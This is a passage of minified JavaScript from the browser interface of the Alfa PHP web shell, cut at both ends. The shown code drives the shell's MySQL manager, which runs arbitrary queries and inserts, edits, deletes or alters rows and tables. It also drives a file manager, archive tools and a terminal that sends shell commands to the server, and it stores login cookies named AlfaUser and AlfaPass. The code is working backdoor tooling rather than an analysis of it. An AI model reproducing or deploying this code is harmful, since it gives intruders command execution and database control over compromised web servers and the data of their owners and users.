textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style=\'padding-left: 50px;\'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style=\'padding-left: 50px;\'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style=\'text-align: left;\'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name=\'"+e.columns[u].name+"\'><option value=\'=\'>=</option><option value=\'!=\'>!=</option><option value=\'>\'>&gt;</option><option value=\'>=\'>&gt;=</option><option value=\'<\'>&lt;</option><option value=\'<=\'>&lt;=</option><option value=\\"= \'\'\\">= \'\'</option><option value=\\"!= \'\'\\">!= \'\'</option><option value=\'LIKE\'>LIKE</option><option value=\'LIKE %...%\'>LIKE %...%</option><option value=\'NOT LIKE\'>NOT LIKE</option><option value=\'REGEXP\'>REGEXP</option><option value=\'REGEXP ^...$\'>REGEXP ^...$</option><option value=\'NOT REGEXP\'>NOT REGEXP</option><option value=\'IN (...)\'>IN (...)</option><option value=\'NOT IN (...)\'>NOT IN (...)</option><option value=\'BETWEEN\'>BETWEEN</option><option value=\'NOT BETWEEN\'>NOT BETWEEN</option><option value=\'IS NULL\'>IS NULL</option><option value=\'IS NOT NULL\'>IS NOT NULL</option></select></td><td><input type=\'"+p+"\' name=\'"+e.columns[u].name+"\'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style=\'text-align: left;\'>"+e.columns[u].name+"</th><td><select name=\'sel_"+e.columns[u].name+"\'>"+f+"</select></td><td><input name=\'value_"+e.columns[u].name+"\' type=\'text\' value=\'"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"\'></td><td><button col_name=\'"+e.columns[u].name+"\' tbl_name=\'"+t+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlAlterTbl(this);return false;\'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name=\'"+e.columns[u].name+"\' rows=\'5\'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type=\'number\' name=\'"+e.columns[u].name+"\' value=\'\'>";break;default:m="<input type=\'text\' name=\'"+e.columns[u].name+"\' value=\'\'>"}r+="<tr><th style=\'text-align: left;\'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style=\'margin-left:20px;\'><button tbl_name=\'"+t+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlUpdateRow(this, \\"insert\\");return false;\'>Insert</button></div><div class=\'mysql-insert-result\'></div>",o+="</table><div class=\'mysql-structure-qres\'></div>",n+="</table><div style=\'padding-left: 384px;margin-top: 15px;\'><button tbl_name=\'"+t+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlSearch(this);return false;\'>Search</button></div>",e.pages>0){l+="<span style=\'cursor:pointer;\' db_id=\'"+i+"\' onclick=\'alfaMysqlChangePage(this,1);\'><<</span> <span> page: </span> <select tbl_name=\'"+t+"\' db_target=\'"+a+"\' name=\'mysql-q-pages\' db_id=\'"+i+"\' class=\'db-opt-id\' onchange=\'alfaMysqlChangePage(this);\' pages=\'"+e.pages+"\'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style=\'cursor:pointer;\' db_id=\'"+i+"\' onclick=\'alfaMysqlChangePage(this,2);\'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border=\'1\'><tr style=\'text-align: left;background-color: #305b8e;color:#FFFFFF;\'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name=\'"+e[c].col+"\' rows=\'5\'>"+e[c].value+"</textarea>";break;case"input":u="<input type=\'"+e[c].type.type+"\' name=\'"+e[c].col+"\' value=\'"+e[c].value+"\'>"}s+="<tr><th style=\'text-align: left;\'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style=\'margin-left:20px;\'><button col_key=\'"+l+"\' key=\'"+r+"\' tbl_name=\'"+o+"\' db_id=\'"+i+"\' db_target=\'"+a+"\' onclick=\'alfaMysqlUpdateRow(this, \\"edit\\");return false;\'>Update</button></div><div class=\'mysql-update-result\'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\\\[\\\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\\\[\\\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\\\[\\\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+=\'<optgroup label="\'+t[l].key+\'">\',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw\'"msg parameter is empty"\';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",\'<div id="\'+i+\'" class="sql-content sql-active-content">\'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",\'<div id="tab_\'+i+\'" opt_id="\'+i+\'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="\'+i+\'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\\\'sql\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>\'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",\'<div id="\'+o+\'" class="options_holder">\'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",\'<div opt_id="\'+o+\'" onclick="optionsTabController(this);" title="\'+l+\'" id="tab_\'+o+\'" class="tab_name tab_is_active">\'+l+\' <img opt_id="\'+o+\'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>\'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",\'alfaBeforeDoAction("\'+e+i+\'");\'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",\'alfaBeforeDoAction("\'+e+i+\'");\'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",\'alfaBeforeDoAction("\'+e+\'");\'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",\'alfaBeforeDoAction("\'+e+\'");\'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \\t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\\/\\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",\'<div id="\'+i+\'" class="terminal-content\'+t+\'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\\\'\'+i+\'\\\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\\\'\'+i+"\',0);\\">-</button><input onchange=\\"alfaTerminalChangecolor(this,\'"+i+\'\\\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="\'+i+\'" onSubmit="alfaExecTerminal(this);this.c.value=\\\'\\\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\\\'\'+i+\'\\\');" term_id="\'+i+\'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\\\'free\\\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="\'+i+\'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="\'+i+\'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>\');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",\'<div onclick="terminalTabController(this);" term_id="\'+i+\'" id="tab_\'+i+\'" class="terminal-tab\'+a+\'">Terminal <img term_id="\'+i+\'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>\'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",\'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>\'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder 